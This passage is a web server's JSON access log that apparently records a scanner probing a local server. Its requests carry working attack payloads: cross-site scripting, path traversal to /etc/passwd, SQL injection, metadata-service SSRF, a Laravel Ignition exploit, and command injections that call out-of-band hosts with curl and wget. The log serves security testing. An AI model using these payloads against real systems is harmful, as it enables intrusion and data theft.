AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.996","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/workreap-temp/297MU3cK8JDhxkSSTPx1CrvP1oQ.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://c9v8h8gsmpv8c1qg07h0stdhu8zd5zwo9.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"{\x22objs\x22: [{\x22FID\x22: \x22init\x22}], \x22SID\x22: \x22|wget http://c9v8h8gsmpv8c1qg07h0wy8dmo95b8w3p.oast.fun|\x22, \x22browser\x22: \x22gecko_linux\x22, \x22backend_version\x22: -1, \x22loc\x22: \x22\x22, \x22_cookie\x22: null, \x22wdebug\x22: 0, \x22RID\x22: \x221629210675639_0.5000855117488202\x22, \x22current_uuid\x22: \x22\x22, \x22ipv6\x22: true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /var HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"Password=297MU7SX6zkbT1M0nijtUJ2jpas&ConfirmPassword=297MU7SX6zkbT1M0nijtUJ2jpas&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/project?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.955","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"13.082","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://c9v8h8gsmpv8c1qg07h04t5f5ufg5tnai.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"\x22name\x22:\x22';$(curl http://c9v8h8gsmpv8c1qg07h0fpauztch1rxwk.oast.fun);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", 